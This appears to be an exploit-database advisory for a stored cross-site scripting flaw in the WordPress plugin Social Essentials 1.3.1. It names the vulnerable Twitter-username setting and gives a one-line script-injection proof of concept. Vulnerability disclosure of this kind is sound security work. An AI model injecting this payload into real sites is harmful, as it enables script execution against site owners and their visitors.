WordPress Social Essentials Social Stats And Sharing Buttons 1.3.1 XSS Vulnerability

🗓️ 18 Dec 2015 00:00:00Reported by Madhu AkulaType

zdt🔗 0day.today👁 19 Views

WordPress Social Essentials Social Stats And Sharing Buttons 1.3.1 XSS Vulnerability detail

WordPress Social Essentials Social Stats And Sharing Buttons 1.3.1 XSS Vulnerability

Plugin Name : Social Essentials Social Stats and Sharing Buttons
 
Effected Version : 1.3.1 (and most probably lower version's if any)
 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Madhu Akula
 

 
Technical Details
 
Minimum Level of Access Required : Administrator
 
PoC - (Proof of Concept) :
 
The following field put the payload as below
 
http://localhost/wp-admin/admin.php?page=social-essentils-setup
se_settings_twitter_username = “><script>alert(1)</script>
 
Vulnerable Parameter : se_settings_twitter_username
 
Type of XSS : Stored

#  0day.today [2018-01-04]  #

18 Dec 2015 00:00Current

6.7Medium risk

Vulners AI Score6.7

wordpress; social essentials; social stats; sharing buttons; vulnerability; cross-site scripting; xss; administrator access; proof of concept; stored; madhu akula; exploit